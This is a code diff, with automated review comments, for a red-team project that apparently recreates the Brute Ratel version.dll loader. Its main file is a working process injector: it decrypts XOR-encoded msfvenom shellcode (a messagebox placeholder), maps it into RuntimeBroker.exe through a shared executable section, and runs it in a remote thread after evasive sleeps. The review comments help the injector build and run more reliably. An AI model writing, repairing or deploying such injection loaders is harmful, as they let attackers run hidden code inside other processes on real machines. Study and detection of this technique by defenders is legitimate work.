     131 + <EnableUAC>false</EnableUAC>
     132 + </Link>
     133 + </ItemDefinitionGroup>
     134 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     135 + <ClCompile>
     136 + <WarningLevel>Level3</WarningLevel>
     137 + <FunctionLevelLinking>true</FunctionLevelLinking>
     138 + <IntrinsicFunctions>true</IntrinsicFunctions>
     139 + <SDLCheck>true</SDLCheck>
     140 + <PreprocessorDefinitions>NDEBUG;VERSION_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     141 + <ConformanceMode>true</ConformanceMode>
     142 + <PrecompiledHeader>Use</PrecompiledHeader>
     143 + <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
     144 + </ClCompile>
     145 + <Link>
     146 + <SubSystem>Windows</SubSystem>
     147 + <EnableCOMDATFolding>true</EnableCOMDATFolding>
     148 + <OptimizeReferences>true</OptimizeReferences>
     149 + <GenerateDebugInformation>true</GenerateDebugInformation>
     150 + <EnableUAC>false</EnableUAC>
     151 + </Link>
     152 + </ItemDefinitionGroup>
     153 + <ItemGroup>
     154 + <ClInclude Include="CreateSection.h" />
     155 + <ClInclude Include="framework.h" />
     156 + <ClInclude Include="pch.h" />
     157 + </ItemGroup>
     158 + <ItemGroup>
     159 + <ClCompile Include="dllmain.cpp" />
     160 + <ClCompile Include="pch.cpp">
     161 + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
     162 + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
     163 + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
     164 + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
     165 + </ClCompile>
     166 + </ItemGroup>
     167 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
     168 + <ImportGroup Label="ExtensionTargets">
     169 + </ImportGroup>
     170 +</Project>
    version.vcxproj.filters
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
     3 + <ItemGroup>
     4 + <Filter Include="Source Files">
     5 + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
     6 + <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
     7 + </Filter>
     8 + <Filter Include="Header Files">
     9 + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
     10 + <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
     11 + </Filter>
     12 + <Filter Include="Resource Files">
     13 + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
     14 + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
     15 + </Filter>
     16 + </ItemGroup>
     17 + <ItemGroup>
     18 + <ClInclude Include="framework.h">
     19 + <Filter>Header Files</Filter>
     20 + </ClInclude>
     21 + <ClInclude Include="pch.h">
     22 + <Filter>Header Files</Filter>
     23 + </ClInclude>
     24 + <ClInclude Include="CreateSection.h">
     25 + <Filter>Header Files</Filter>
     26 + </ClInclude>
     27 + </ItemGroup>
     28 + <ItemGroup>
     29 + <ClCompile Include="dllmain.cpp">
     30 + <Filter>Source Files</Filter>
     31 + </ClCompile>
     32 + <ClCompile Include="pch.cpp">
     33 + <Filter>Source Files</Filter>
     34 + </ClCompile>
     35 + </ItemGroup>
     36 +</Project>
    versionConsole/CreateSection.h
     1 +#pragma once
     2 + 
     3 +//All credits to https://github.com/peperunas/injectopi/tree/master/CreateSection
     4 +//@file CreateSection.h
     5 +//@author Giulio De Pasquale, hasherezade
     6 +//@brief Section Hijacking
     7 +#pragma once
     8 + 
     9 +#include <Windows.h>
     10 +#include <stdio.h>
     11 + 
     12 +#if !defined NTSTATUS
     13 +typedef LONG NTSTATUS;
     14 +#endif
     15 + 
     16 +#define STATUS_SUCCESS 0
     17 + 
     18 +#if !defined PROCESSINFOCLASS
     19 +typedef LONG PROCESSINFOCLASS;
     20 +#endif
     21 + 
     22 +#if !defined PPEB
     23 +typedef struct _PEB* PPEB;
     24 +#endif
     25 + 
     26 +#if !defined PROCESS_BASIC_INFORMATION
     27 +typedef struct _PROCESS_BASIC_INFORMATION {
     28 + PVOID Reserved1;
     29 + PPEB PebBaseAddress;
     30 + PVOID Reserved2[2];
     31 + ULONG_PTR UniqueProcessId;
     32 + PVOID Reserved3;
     33 +} PROCESS_BASIC_INFORMATION;
     34 +#endif;
     35 + 
     36 +typedef LONG NTSTATUS, * PNTSTATUS;
     37 +typedef struct _UNICODE_STRING {
     38 + USHORT Length;
     39 + USHORT MaximumLength;
     40 + PWSTR Buffer;
     41 +} UNICODE_STRING, * PUNICODE_STRING;
     42 + 
     43 +typedef struct _OBJECT_ATTRIBUTES {
     44 + ULONG Length;
     45 + HANDLE RootDirectory;
     46 + PUNICODE_STRING ObjectName;
     47 + ULONG Attributes;
     48 + PVOID SecurityDescriptor;
     49 + PVOID SecurityQualityOfService;
     50 +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
     51 + 
     52 +#define NT_SUCCESS(Status) ((NTSTATUS)(Status) == STATUS_SUCCESS)
     53 + 
     54 +typedef OBJECT_ATTRIBUTES* POBJECT_ATTRIBUTES;
     55 +#define InitializeObjectAttributes( p, n, a, r, s ) { \
     56 + (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
     57 + (p)->RootDirectory = r; \
     58 + (p)->Attributes = a; \
     59 + (p)->ObjectName = n; \
     60 + (p)->SecurityDescriptor = s; \
     61 + (p)->SecurityQualityOfService = NULL; \
     62 + }
     63 + 
     64 +typedef NTSTATUS(WINAPI* PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE,
     65 + PROCESSINFOCLASS, PVOID,
     66 + ULONG, PULONG);
     67 + 
     68 +NTSTATUS(NTAPI* ZwQueryInformationProcess)
     69 +(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass,
     70 + PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
     71 + 
     72 +NTSTATUS(NTAPI* ZwCreateSection)
     73 +(_Out_ PHANDLE SectionHandle, _In_ ACCESS_MASK DesiredAccess,
     74 + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
     75 + _In_opt_ PLARGE_INTEGER MaximumSize, _In_ ULONG SectionPageProtection,
     76 + _In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle);
     77 + 
     78 +NTSTATUS(NTAPI* NtMapViewOfSection)
     79 +(_In_ HANDLE SectionHandle, _In_ HANDLE ProcessHandle,
     80 + _Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _In_ SIZE_T CommitSize,
     81 + _Inout_opt_ PLARGE_INTEGER SectionOffset, _Inout_ PSIZE_T ViewSize,
     82 + _In_ DWORD InheritDisposition, _In_ ULONG AllocationType,
     83 + _In_ ULONG Win32Protect);
     84 + 
     85 +NTSTATUS(NTAPI* ZwCreateThreadEx)
     86 +(_Out_ PHANDLE ThreadHandle, _In_ ACCESS_MASK DesiredAccess,
     87 + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ProcessHandle,
     88 + _In_ PVOID StartRoutine, _In_opt_ PVOID Argument, _In_ ULONG CreateFlags,
     89 + _In_opt_ ULONG_PTR ZeroBits, _In_opt_ SIZE_T StackSize,
     90 + _In_opt_ SIZE_T MaximumStackSize, _In_opt_ PVOID AttributeList);
     91 + 
     92 + 
     93 +NTSTATUS(NTAPI* ZwUnmapViewOfSection)
     94 +(_In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress);
     95 + 
     96 + 
     97 +NTSTATUS(NTAPI* ZwClose)(_In_ HANDLE Handle);
     98 + 
     99 +typedef struct _CLIENT_ID
     100 +{
     101 + PVOID UniqueProcess;
     102 + PVOID UniqueThread;
     103 +} CLIENT_ID, * PCLIENT_ID;
     104 + 
     105 +NTSTATUS(NTAPI* ZwOpenProcess)
     106 +(
     107 + PHANDLE ProcessHandle,
     108 + ACCESS_MASK DesiredAccess,
     109 + POBJECT_ATTRIBUTES ObjectAttributes,
     110 + PCLIENT_ID ClientID
     111 + );
     112 + 
     113 +NTSTATUS(NTAPI* NtDelayExecution)(
     114 + BOOL Alertable,
     115 + PLARGE_INTEGER DelayInterval
     116 + );
     117 + 
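Review bot: The `#if !defined NTSTATUS` / `PROCESSINFOCLASS` / `PPEB` / `PROCESS_BASIC_INFORMATION` guards on lines 12–26 test preprocessor macros, but all four names are typedefs, so the guards are always true and would not stop a redefinition error in a translation unit that also pulls in `<winternl.h>`, which defines the same `_PROCESS_BASIC_INFORMATION`, `_UNICODE_STRING` and `_OBJECT_ATTRIBUTES` structs that lines 27–50 define unconditionally. Line 36 re-typedefs `NTSTATUS` and line 54 re-typedefs `POBJECT_ATTRIBUTES` (already produced by line 50), `#endif;` on line 34 carries a stray semicolon, and `#pragma once` appears on both line 1 and line 7. The `NTSTATUS(NTAPI* …)` function-pointer globals from line 68 onward are definitions rather than declarations, so including this header from a second translation unit would produce duplicate-symbol link errors; declare them `extern` here and define them once in the .cpp, e.g. `extern NTSTATUS(NTAPI* ZwClose)(_In_ HANDLE Handle);`. `ZwQueryInformationProcess` (line 68) and `ZwUnmapViewOfSection` (line 93) are defined but never resolved in `LoadNtdllFunctions`, so they stay NULL for the lifetime of the process.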
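--- a/versionConsole/versionConsole.cpp
+++ b/versionConsole/versionConsole.cpp
@@ -0,0 +1,210 @@
+#include <Windows.h>
+#include <TlHelp32.h>
+#include <stdlib.h>
+#include "CreateSection.h"
+#include <iostream>
+#pragma comment(lib, "ntdll")
+
+#define _CRT_SECURE_NO_DEPRECATE
+#pragma warning (disable : 4996)
+
+// All credits to https://github.com/peperunas/injectopi/blob/master/CreateSection/CreateSection.cpp
+// and https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/#Modification-of-Versiondll
+
+/*
+ Console version for the purpose of debugging. Uses messagebox shellcode from the file (not from disk).
+*/
+BOOL LoadNtdllFunctions() {
+ HMODULE ntdll = GetModuleHandleA("ntdll.dll");
+
+ ZwOpenProcess = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PCLIENT_ID))GetProcAddress(ntdll, "ZwOpenProcess");
+ if (ZwOpenProcess == NULL) return FALSE;
+
+ ZwCreateSection = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE))
+ GetProcAddress(ntdll, "ZwCreateSection");
+ if (ZwCreateSection == NULL) return FALSE;
+
+ NtMapViewOfSection = (NTSTATUS(NTAPI*)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG))
+ GetProcAddress(ntdll, "NtMapViewOfSection");
+ if (NtMapViewOfSection == NULL) return FALSE;
+
+ ZwCreateThreadEx = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, ULONG_PTR, SIZE_T, SIZE_T, PVOID))
+ GetProcAddress(ntdll, "ZwCreateThreadEx");
+ if (ZwCreateThreadEx == NULL) return FALSE;
+
+ NtDelayExecution = (NTSTATUS(NTAPI*)(BOOL, PLARGE_INTEGER))GetProcAddress(ntdll, "NtDelayExecution");
+ if (NtDelayExecution == NULL) return FALSE;
+
+ ZwClose = (NTSTATUS(NTAPI*)(HANDLE))GetProcAddress(ntdll, "ZwClose");
+ if (ZwClose == NULL) return FALSE;
+
+ return TRUE;
+}
+
+HANDLE getProcHandlebyName(const char* procName) {
+ PROCESSENTRY32 entry;
+ entry.dwSize = sizeof(PROCESSENTRY32);
+ NTSTATUS status = NULL;
+ HANDLE hProc = 0;
+
+ HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
+ if (Process32First(snapshot, &entry)) {
+ do {
+ if (strcmp((entry.szExeFile), procName) == 0) {
+ OBJECT_ATTRIBUTES oa;
+ CLIENT_ID cid = { (HANDLE)entry.th32ProcessID, NULL };
+ InitializeObjectAttributes(&oa, nullptr, 0, nullptr, nullptr);
+ std::wcout << L"[+] Proc name: " << entry.szExeFile << ", [+] id: " << entry.th32ProcessID << "\n";
+ // 3. Call the Windows API ntdll ZwOpenProcess using the process ID from step 1. The process is opened with full control access.
+ status = ZwOpenProcess(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);
+
+ if (!NT_SUCCESS(status)) {
+ continue;
+ }
+ return hProc;
+ }
+ } while (Process32Next(snapshot, &entry));
+ }
+ ZwClose(snapshot);
+
+ return NULL;
+}
+
+// credit: Sektor7 RTO Malware Essential Course
+void XOR(char* data, size_t data_len, char* key, size_t key_len) {
+ int j;
+
+ j = 0;
+ for (int i = 0; i < data_len; i++) {
+ if (j == key_len - 1) j = 0;
+
+ data[i] = data[i] ^ key[j];
+ j++;
+ }
+}
+
+
+
+int main()
+{
+ // Shellcode for debugging purposes
+ // msfvenom -p windows/x64/messagebox text="stage0 shellcode" title="choi redteam playbook" -f c exitfunc=thread --encrypt xor --encrypt-key "jikoewarfkmzsdlhfnuiwaejrpaw" exitfunc=thread -v shellcode
+ unsigned char shellcode[] =
+ "\x96\x21\xea\x8b\x95\x88\x9e\x8d\x8e\xbb\x6d\x7a\x73\x25\x3d"
+ "\x29\x36\x3c\x24\x3f\x3f\x50\xb7\x0f\x3a\xfb\x33\x17\x54\x21"
+ "\xe0\x3d\x7d\x49\x29\xf9\x34\x4b\x53\x32\xf8\x16\x3c\x56\x2e"
+ "\x61\xc2\x23\x3d\x2c\x54\xa3\x3a\x41\xa1\xdb\x56\x08\x17\x6d"
+ "\x49\x57\x20\xb3\xaf\x66\x2c\x7b\xb2\x86\x81\x3a\x27\x3f\x4b"
+ "\x21\xfc\x33\x45\x54\xf9\x32\x5d\x3f\x6b\xb9\x55\xe4\xe5\xff"
+ "\x61\x72\x66\x23\xe8\xba\x07\x0b\x24\x69\xb6\x3e\x4b\xe2\x3f"
+ "\x79\x5b\x2e\xf9\x30\x41\x3e\x6b\xb9\x88\x33\x2d\x88\xa8\x4c"
+ "\x27\xe0\x59\xf2\x3b\x65\xba\x25\x57\xa7\x3d\x58\xb7\xcd\x24"
+ "\xab\xbb\x7d\x20\x76\xab\x51\x8b\x1a\x94\x49\x2d\x71\x2a\x4f"
+ "\x65\x3f\x4a\xb5\x19\xbe\x3e\x50\x31\xe2\x37\x45\x2c\x6b\xa2"
+ "\x16\x5f\x36\xe1\x65\x23\x51\x21\xfc\x21\x6e\x2f\x6a\xbd\x44"
+ "\x32\xef\x68\xe0\x2e\x6f\xa5\x28\x2f\x20\x3d\x34\x2b\x2a\x20"
+ "\x2f\x2b\x30\x2a\x35\x2d\xf4\x8d\x52\x27\x39\x92\x9a\x2b\x25"
+ "\x35\x32\x58\x26\xfe\x7b\x9e\x28\x9a\x95\x8d\x2d\x28\xb0\xab"
+ "\x69\x6b\x6f\x65\x49\x29\xff\xf3\x71\x6c\x7a\x73\x5a\x20\xe5"
+ "\xe3\x45\x74\x69\x77\x29\x54\xa3\x33\xca\x24\xf4\x3c\x6e\x94"
+ "\xba\xde\x97\x7c\x58\x6c\x2a\xd7\xdc\xe6\xd9\xf1\x97\xb3\x26"
+ "\xf6\xad\x5f\x5d\x63\x16\x78\xf0\x9a\x97\x1f\x6c\xd0\x28\x76"
+ "\x05\x0e\x18\x66\x32\x2c\xf3\xa9\x9b\xb9\x1b\x12\x0f\x12\x0c"
+ "\x47\x41\x16\x02\x17\x1c\x0d\x14\x05\x0d\x0e\x6f\x06\x1f\x0e"
+ "\x1b\x46\x19\x08\x1e\x07\x01\x0d\x05\x46\x1e\x19\x08\x0e\x03"
+ "\x0a\x05\x19\x70";
+
+
+ if (LoadNtdllFunctions() == FALSE) {
+ printf("[-] Failed to load NTDLL function\n");
+ return -1;
+ }
+
+ // 1. Enumerate all process and locate process for RuntimeBroker.exe
+ // https://stackoverflow.com/questions/865152/how-can-i-get-a-process-handle-by-its-name-in-c
+ HANDLE hProc = getProcHandlebyName("RuntimeBroker.exe");
+ if (hProc == NULL) {
+ printf("[-] Process not found. Exiting.\n");
+ exit(0);
+ }
+
+ // https://github.com/peperunas/injectopi/blob/master/CreateSection/CreateSection.cpp
+ HANDLE hSection = NULL;
+ NTSTATUS status = NULL;
+ SIZE_T size = 4096;
+ LARGE_INTEGER sectionSize = { size };
+ PVOID pLocalView = NULL, pRemoteView = NULL;
+ SIZE_T shellcodeSize = sizeof(shellcode);
+ int viewUnMap = 2;
+
+ char key[] = "jikoewarfkmzsdlhfnuiwaejrpaw";
+
+ // 4. Decrypt the payload file using the XOR encryption algorithm with a 28-byte key of: jikoewarfkmzsdlhfnuiwaejrpaw
+ XOR((char*)shellcode, shellcodeSize, key, sizeof(key));
+
+ // 5. Call the Windows API NtCreateSection, which creates a block of memory that can be shared between processes.
+ if ((status = ZwCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
+ printf("[-] Cannot create section. Error code: %08X\n", status);
+ return -1;
+ }
+ printf("[+] Section: %p\n", hSection);
+
+ // 6. Two calls into the Windows API NtMapViewOfSection. The first call maps the contents of the decrypted payload into the current process memory space.
+ if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(),
+ &pLocalView, NULL, NULL, NULL,
+ &size, viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
+ printf("[-] Cannot create Local view. Error code: %08X\n", status);
+ return -1;
+ }
+ printf("[+] Local view: %p\n", pLocalView);
+
+ printf("[+] Copying shellcode into the view\n");
+ // Use for in-library shellcode
+ memcpy(pLocalView, shellcode, sizeof(shellcode));
+
+ // Use for on-disk shellcode
+ //memcpy(pLocalView, shellcode, shellcodeSize);
+
+ // 6. Two calls into the Windows API NtMapViewOfSection. The first call maps the contents of the decrypted payload into the current process memory space.
+ if ((status = NtMapViewOfSection(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
+ &size, viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
+ printf("[-] Cannot create remote view. Error code: %08X\n", status);
+ return -1;
+ }
+ printf("[+] Remote view: %p\n", pRemoteView);
+
+
+ // 7. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
+ // NtDelayExecution works with console tho.
+ printf("[+] Sleeping for 4.27 seconds...\n");
+ LARGE_INTEGER interval;
+ interval.QuadPart = -1 * (int)(4270 * 10000.0f);
+ if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
+ printf("[-] Cannot delay execution. Error code: %08X\n", status);
+ return -1;
+ }
+
+ //Sleep(4270);
+
+ // 8. Call the Windows API NtCreateThreadEx.
+ HANDLE hThread = NULL;
+ if ((status = ZwCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProc, pRemoteView, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS) {
+ printf("[-] Cannot create thread. Error code: %08X\n", status);
+ return -1;
+ }
+ printf("[+] Thread: %p\n", hThread);
+
+ // 9. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27
+ printf("[+] Sleeping again for 4.27 seconds...\n");
+ interval.QuadPart = -1 * (int)(4270 * 10000.0f);
+ if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
+ printf("[-] Cannot delay execution. Error code: %08X\n", status);
+ return -1;
+ }
+
+ // 10. Finished.
+ printf("[+] Executing thread.\n");
+ ResumeThread(hThread);
+
+ return 0;
+}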
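Review bot: `getProcHandlebyName` returns from inside the loop on line 64 without closing `snapshot`, and never checks the `CreateToolhelp32Snapshot` result against `INVALID_HANDLE_VALUE` before handing it to `Process32First` on line 51; add `if (snapshot == INVALID_HANDLE_VALUE) return NULL;` after line 50 and change line 64 to `ZwClose(snapshot); return hProc;`. The same release pattern is missing throughout `main`: `hSection`, `pLocalView`, `hProc` and `hThread` are never closed or unmapped on the error returns at lines 148–202 or after `ResumeThread` on line 207, and `ZwUnmapViewOfSection` from CreateSection.h is never resolved in `LoadNtdllFunctions`, so the local view cannot be unmapped at all. `strcmp(entry.szExeFile, procName)` on line 53 only compiles when `PROCESSENTRY32` resolves to the ANSI variant, yet three of the four configurations in versionConsole.vcxproj set `CharacterSet` to Unicode, where `szExeFile` is a `WCHAR` array — use `PROCESSENTRY32W` with `wcscmp` (and `Process32FirstW`/`Process32NextW`) or pin the ANSI struct explicitly so the build does not depend on the configuration. `exit(0)` on line 128 reports success for the process-not-found case while every other failure returns -1, and the literals `0x1FFFFF` on line 191 and `viewUnMap = 2` on line 138 would read better as the named `THREAD_ALL_ACCESS` and `ViewUnmap` constants. `NtDelayExecution(TRUE, …)` on lines 182 and 200 is alertable, so a non-zero success status such as a delivered user APC would be reported as a failure by the `!= STATUS_SUCCESS` test; `NT_SUCCESS(status)` is already defined in the header for exactly this.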
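--- a/versionConsole/versionConsole.vcxproj
+++ b/versionConsole/versionConsole.vcxproj
@@ -0,0 +1,151 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup Label="ProjectConfigurations">
+ <ProjectConfiguration Include="Debug|Win32">
+ <Configuration>Debug</Configuration>
+ <Platform>Win32</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|Win32">
+ <Configuration>Release</Configuration>
+ <Platform>Win32</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Debug|x64">
+ <Configuration>Debug</Configuration>
+ <Platform>x64</Platform>
+ </ProjectConfiguration>
+ <ProjectConfiguration Include="Release|x64">
+ <Configuration>Release</Configuration>
+ <Platform>x64</Platform>
+ </ProjectConfiguration>
+ </ItemGroup>
+ <PropertyGroup Label="Globals">
+ <VCProjectVersion>16.0</VCProjectVersion>
+ <Keyword>Win32Proj</Keyword>
+ <ProjectGuid>{19d8dd80-682e-4f0b-bbee-a04fb5cfd0d1}</ProjectGuid>
+ <RootNamespace>versionConsole</RootNamespace>
+ <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <PlatformToolset>v142</PlatformToolset>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <PlatformToolset>v142</PlatformToolset>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>true</UseDebugLibraries>
+ <PlatformToolset>v142</PlatformToolset>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <PlatformToolset>v142</PlatformToolset>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>MultiByte</CharacterSet>
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+ <ImportGroup Label="ExtensionSettings">
+ </ImportGroup>
+ <ImportGroup Label="Shared">
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+ <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+ </ImportGroup>
+ <PropertyGroup Label="UserMacros" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <LinkIncremental>true</LinkIncremental>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ <LinkIncremental>false</LinkIncremental>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+ <LinkIncremental>true</LinkIncremental>
+ </PropertyGroup>
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+ <LinkIncremental>false</LinkIncremental>
+ </PropertyGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+ <ClCompile>
+ <WarningLevel>Level3</WarningLevel>
+ <SDLCheck>true</SDLCheck>
+ <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <ConformanceMode>true</ConformanceMode>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+ <ClCompile>
+ <WarningLevel>Level3</WarningLevel>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <IntrinsicFunctions>true</IntrinsicFunctions>
+ <SDLCheck>true</SDLCheck>
+ <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <ConformanceMode>true</ConformanceMode>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <EnableCOMDATFolding>true</EnableCOMDATFolding>
+ <OptimizeReferences>true</OptimizeReferences>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+ <ClCompile>
+ <WarningLevel>Level3</WarningLevel>
+ <SDLCheck>true</SDLCheck>
+ <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <ConformanceMode>true</ConformanceMode>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+ <ClCompile>
+ <WarningLevel>Level3</WarningLevel>
+ <FunctionLevelLinking>true</FunctionLevelLinking>
+ <IntrinsicFunctions>true</IntrinsicFunctions>
+ <SDLCheck>true</SDLCheck>
+ <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <ConformanceMode>true</ConformanceMode>
+ </ClCompile>
+ <Link>
+ <SubSystem>Console</SubSystem>
+ <EnableCOMDATFolding>true</EnableCOMDATFolding>
+ <OptimizeReferences>true</OptimizeReferences>
+ <GenerateDebugInformation>true</GenerateDebugInformation>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemGroup>
+ <ClCompile Include="versionConsole.cpp" />
+ </ItemGroup>
+ <ItemGroup>
+ <ClInclude Include="..\framework.h" />
+ <ClInclude Include="CreateSection.h" />
+ </ItemGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+ <ImportGroup Label="ExtensionTargets">
+ </ImportGroup>
+</Project>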
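--- a/versionConsole/versionConsole.vcxproj.filters
+++ b/versionConsole/versionConsole.vcxproj.filters
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup>
+ <Filter Include="Source Files">
+ <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+ <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+ </Filter>
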